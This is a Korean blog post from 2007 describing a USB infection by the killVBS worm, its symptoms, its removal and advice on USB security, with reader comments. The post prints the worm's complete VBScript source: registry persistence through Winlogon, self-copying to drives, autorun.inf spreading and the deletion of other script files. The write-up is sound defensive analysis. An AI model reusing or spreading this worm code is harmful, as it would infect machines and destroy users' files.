PC에 꽂고 자료를 보려고 하던중 이상한 메세지와 함께 경고 문구가 올라 옵니다..순간 바이러스나 웜에 감염된 것을 알수 있었습니다..
" 갑작스러운 경고 문구에 이게 무슨일이래? "
하면서 다행히 백신이 있었기에 검사를 해 보았습니다.
그런데
"주소가 잘못 되었다고 나옵니다.." "난 아무짓도 안했는데...."
주로 감염이 되면 자신도 모르게 브라우져 메인 화면이 위 그림과 같이 변하면 바이러스에 감염이 되었다고
생각하시면 됩니다..
<그림 -2> 백신으로 검색하였을때 감염 발견
그리고 나서 백신으로 검사를 해 보았습니다...아주 바이러스가 바로 걸리더군요...우쒸...무슨 짓을 할지 모르니
<그림-3> 감염 바이러스 세부 감염 조치내역
그리고 바이러스 정보 싸이트에서 어떤 영향을 미치는지 찾아 보니 네트워크 트래픽을 유발 한다고 합니다.
위 그림은 뒤에 버전이 544 인데 548로 보아 변종인 듯 싶습니다..
<그림-4> 감염 스크립트 파일
그리고 이동 디스크에 폴더 보기-->숨김파일 체크를 해제하여 숨김파일 까지 보게 하여 보면 위 그림과 같은 파일이 있었습니다..
메모장을 가지고 그 내용을 보았습니다..
'**********************************************************
'******************** Anti autorun vbscript ***************
'******************** Version 1.01 ***************
'**********************************************************
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv=File.Drive
Set InDrive = Fso.drives
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")
WriteAll.Attributes = -1
End If
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs"
For Each Drives In InDrive
If Drives.DriveType=2 Then
LookVBS "inf",Drives.Path & "\"
LookVBS "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"
LookVBS "vbs",WinDir & "\"
LookVBS "vbs",Drives.Path & "\"
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")
WriteAll.Attributes = -1
End If
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End if
End if
End If
Next
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
내용을 보니 대충 알것 같았습니다.. 그것은 wscript 시스템 파일을 killVBS 파일로 바꾸어 변조시키고 이 파일을 레지스트리 깊숙이 넣어서 재부팅을 해도 지속적으로 활동하게 만들었습니다..
<그림-5> usb 꽂으면 자동실행 파일
이동디스크 숨김파일을 전부 보면 이렇게 자동으로 실행하는 파일을 만들게 하였는데 wscript 파일이 killVBS파일로 동작하게끔 만들어 졌었습니다.
그리고 나서 백신으로 치료를 했는데 분명히 치료가 되었다고 하여도 또 그대로 입니다...무슨 문제일까요?
그래서 이동디스크를 파일을 백업을 받고 나서 빠른 포멧을 시켰습니다...그래도 동일합니다...그건 이동디스크가 점유하고 있는 디스크가 플러그인 되자 마자 클릭을 해 보면 열리지 않고 또 경고 문구가 나옵니다.
이동디스크 바이러스에 대한 가장 일반적인 형태입니다..그래서 이번에 아예 빠른 포멧이 아닌 정상적인 포멧을 하였습니다..그랬더니 이번에 아무 문제가 없었습니다.
이동디스크는 치료가 되었지만 PC에 있는 파일 제거가 문제였습니다...
그렇게 해서 살펴 보던중 비슷한 경험을 하여 적어 놓은 것을 검색하여 찾게 되었습니다..
관련 싸이트 : killVBS.vbs 수동으로 제거 하기
위 방법대로 하고 나니 가장 문제였던 window -->system32-->killVBS라는 스크립트 파일이 wscript 파일로 원래 파일로 돌아왔습니다..무슨 파일인지는 잘 모르겠으나 분명 윈도우 시스템 파일이었습니다.
그 사실은 감염되었을때 같은 아이콘이 killVBS라고 되었고 날짜도 오늘 날짜였습니다..하지만 수동으로 제거를 하고 나니 같은 아이콘인데 wscript 파일로 되어 있었으며 날짜도 2004년 날짜로 되어 있었습니다..
바이러스, 웜 , 아무리 조심해도 어쩔수 없나 봅니다..그래서 무엇보다 최신 백신을 설치하고 이동디스크는 플러그인 할때 꼭 백신 검사를 해 보시기 바랍니다...꼭이요.,..이거 찾고 하느라고 꽤 많은 시간을 허비 하였습니다.
흔히 usb 하면 이동디스크로 간편하게 잘 사용하고 있지만 지금 처럼 감염이 되면 네트워크에 부하을 일으키는 주범이 되기도 하고, 또는 중요한 파일을 넣어가지고 다닐때 분실하면 많은 자료 유출에 우려 사항도 있습니다.
따라서 usb를 사용하더라도 분실과 바이러스 감염에 대응 할수 있는 방안으로 폴더에 암호를 건다든지 보안 usb를 사용한다든지 하는 usb에 대한 보안마인드를 평소 가져야 겠습니다.
여러분들도 수고를 덜으시라고 포스팅 해 봅니다... 바이러스야 물러가라~~~~워이~~~
이올린에 북마크하기
이올린에 추천하기'IT Trend' 카테고리의 다른 글
| 티스토리 블로그 알리미 기능으로 실시간 댓글 달자 (0) | 2007/10/31 |
|---|---|
| Gmail 4기가, 파란 우린 5G 용량이라네.. (4) | 2007/10/30 |
| USB 이용한 바이러스 killVBS (VBS Generic.544) 바이러스 (5) | 2007/10/29 |
| 이건 메일이 아니라 웹하드네 그려 -Gmail (2) | 2007/10/25 |
| 티스토리에도 플로그인을 올릴수 있었으면?? (8) | 2007/10/24 |
| 블로그 시작서 100만 힛트까지 (2) | 2007/10/23 |
- 보안인닷컴 대표운영자 (http://www.boanin.com)
- 보안인닷컴 팀블로그 치프로거 (http://blog.boanin.com)
- 한국정보보호진흥원 ISMS 인증심사원
- 한국CISSP협회 홍보분과 이사/ 지경부 IT멘토링 멘토
**********************************************************************************************************
본 포스팅의 저작권은 엔시스에 있으며 상업적 이용을 배제하며 콘텐츠 이용시에는
반드시 출처와 링크를 이용해 주시기 바랍니다. 무단도용은 저작권법에 저촉을 받습니다..
**********************************************************************************************************
-한RSS추가를 하시거나 추천을 하시면 더 많은 분들에게 전달되어 구독될수 있습니다.
댓글을 달아 주세요
왠지 바이러스 걸렸다고 생각하니 찜찜해서 무얼 할수가 없더군요..그래서 시간이 좀 허비 되었네요..조금 더 지켜 봐야겠습니다..^^
제가 쓴 내용을 한글자도 틀리지 않고 그대로 가져갔군요..
http://blog.daum.net/bobodong/5343599
우선 댓글로 출처를 요구하였으나 지켜 보겠습니다..
10/30 가져가신 블로거님께서 출처를 밝히셨습니다.
감사합니다..
엔시스님의 해당포스트가 10/30일 버즈블로그 메인 헤드라인으로 링크되었습니다.
감사합니다..
좋은 정보 잘 보았습니다. 그런데..
http://boanchanggo.tistory.com/50
여기도 비슷한(?) 내용이 있네요.. 한번 가서 확인해 보세요..
구글에서 USB wscript 로 검색했었습니다.